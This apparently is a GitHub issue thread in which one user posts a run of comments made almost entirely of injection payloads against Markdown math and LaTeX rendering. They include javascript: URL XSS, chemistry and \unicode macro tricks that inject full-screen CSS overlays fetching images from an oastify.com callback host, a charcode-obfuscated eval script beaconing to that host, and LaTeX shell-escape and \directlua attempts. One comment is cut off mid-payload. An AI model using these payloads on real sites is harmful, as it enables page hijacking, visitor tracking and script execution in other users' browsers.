rabahnaceri2020 / test02

test02
0 stars 0 forks source link

\begin{verbatim}<IMG SRC="javascript:alert('XSS');">\end{verbatim} #3

Open rabahnaceri2020 opened 5 months ago

rabahnaceri2020 commented 5 months ago

\begin{verbatim}\end{verbatim}

rabahnaceri2020 commented 5 months ago

\begin{verbatim}\end{verbatim}

rabahnaceri2020 commented 5 months ago

$\href{javascript:alert('hello');}{test}$

rabahnaceri2020 commented 5 months ago

\includegraphics[height=0.8em, totalheight=0.9em, width=0.9em, alt=KA logo]{https://katex.org/img/khan-academy.png}

rabahnaceri2020 commented 5 months ago

\Delta

rabahnaceri2020 commented 5 months ago

$$\ce{$\unlhd[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}$}$$

rabahnaceri2020 commented 5 months ago

$$\ce{$\up[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}$}$$

rabahnaceri2020 commented 5 months ago

$\lfloor{}$ $\lceil{}$ $\circ{}$ $\&{}$ $\Pi{}$ $\pi{}$ $\Theta{}$ $\theta{}$ $\Omega{}$ $\omega{}$ $\varOmega{}$ $\xi{}$ $\zeta{}$ $\int{}$ $\oint{}$ $\iota{}$ $\mu{}$ $\nu{}$ $\&{}$ $\alpha{}$ $\beta{}$ $\gamma{}$ $\delta{}$ $\epsilon{}$ $\eta{}$ $\kappa{}$ $\lambda{}$ $\lambda{}$ $\sigma{}$ $\tau{}$ $\upsilon{}$ $\phi{}$ $\chi{}$ $\psi{}$ $\omega{}$ $\xi{}$ $\zeta{}$ $\&{}$ $\exists{}$ $\forall{}$ $\alpha{}$ $\beta{}$ $\gamma{}$ $\delta{}$ $\epsilon{}$ $\zeta{}$ $\eta{}$ $\theta{}$ $\iota{}$ $\kappa{}$ $\lambda{}$ $\mu{}$ $\nu{}$ $\xi{}$ $\omicron{}$ $\pi{}$ $\rho{}$ $\sigma{}$ $\tau{}$ $\upsilon{}$ $\phi{}$ $\chi{}$ $\psi{}$ $\omega{}$

rabahnaceri2020 commented 5 months ago

$\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$ $\Bigg(\Bigg)$

rabahnaceri2020 commented 5 months ago

$$\ce{$\biggr[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}$}$$

rabahnaceri2020 commented 5 months ago

$$!{$\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}$}$$ $$#{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\%{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\&{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\’{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$({\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$){\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\…{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $${}$$ $$#{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\”{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\${\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$\,{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$ $$.{\unicode[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50

rabahnaceri2020 commented 5 months ago

$$#{\u006E\u0069\u0076\u0065[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$

rabahnaceri2020 commented 5 months ago

$<script> eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 105, 109, 103, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 115, 58, 47, 47, 99, 103, 119, 118, 54, 104, 113, 51, 110, 117, 56, 57, 103, 118, 111, 97, 120, 53, 48, 109, 105, 115, 102, 99, 110, 51, 116, 117, 104, 109, 55, 97, 119, 46, 111, 97, 115, 116, 105, 102, 121, 46, 99, 111, 109, 47, 116, 101, 115, 116, 39, 62, 34, 41, 59)); </script>$

rabahnaceri2020 commented 5 months ago

$$#{\def\foo[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$

rabahnaceri2020 commented 5 months ago

\documentclass{article} \usepackage{fontspec} \setmainfont{goombafont}

\begin{document}

\newcommand{\injectCSS}{\begingroup \catcode\#=12 \relax \directlua{ tex.print("\\noexpand\\newcommand{\\noexpand\\injectCSS}{ \\noexpand\\begingroup \\noexpand\\catcode\noexpand\#=12 \noexpand\relax \noexpand\directlua{ tex.print( '\noexpand\noexpand\noexpand\newcommand{\noexpand\noexpand\noexpand\goombafont}{ \noexpand\noexpand\noexpand\begingroup \noexpand\noexpand\noexpand\catcode`\noexpand\noexpand\noexpand\#=12 \noexpand\noexpand\noexpand\relax \noexpand\noexpand\noexpand\directlua{ tex.print( \"\noexpand\noexpand\noexpand\makeatletter \noexpand\noexpand\noexpand\def\noexpand\noexpand\noexpand\goombafont{\\textcolor{red}{\\@ifnextchar[\noexpand\noexpand\noexpand\@secondoftwo\noexpand\noexpand\noexpand\@firstoftwo}} \noexpand\noexpand\noexpand\makeatother\" ) } \noexpand\noexpand\noexpand\endgroup } ) } \noexpand\endgroup }" } \endgroup}

\injectCSS

\goombafont[fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}

\end{document}

rabahnaceri2020 commented 5 months ago

\documentclass{article} \usepackage{fontspec} \usepackage{xcolor}

% Define a new command outside of math mode \newcommand{\injectCSS}{ \leavevmode \begingroup \catcode\#=12 \catcode_=12 \gdef\myCSS{\textcolor{red}{\kern1pt\relax}} \endgroup }

% Inject the CSS and HTML using the new command \newcommand{\applyPayload}{ \injectCSS \immediate\write18{ echo "" >> \jobname.html } }

\begin{document}

% Apply the payload \applyPayload

% Use the payload in the document $$\myCSS{x0000}$$

\end{document}

rabahnaceri2020 commented 5 months ago

$$\leavevmode\kern1pt\relax\def~{\catcode`#=12\relax}\let!~\def~{\u006E\u0069\u0076\u0065[goombafont;color:red;pointer-events:none;z-index:5;position:fixed;inset:0;opacity:100%;background-size:100% 100%;background-image:url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}!~$$

rabahnaceri2020 commented 5 months ago

$$%23{\u006E\u0069\u0076\u0065[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://cgwv6hq3nu89gvoax50misfcn3tuhm7aw.oastify.com/test');]{x0000}}$$

rabahnaceri2020 commented 5 months ago

$$%23{\u006E\u0069\u0076\u0065[goombafont; color:red; pointer-events: none; z-index: 5; position: fixed; inset: 0; opacity: 100%; background-size: 100% 100%; background-image: url('https://pbs.twimg.com/profile_images/1798640902501814272/iddzIf1o_400x400.jpg');]{x0000}}$$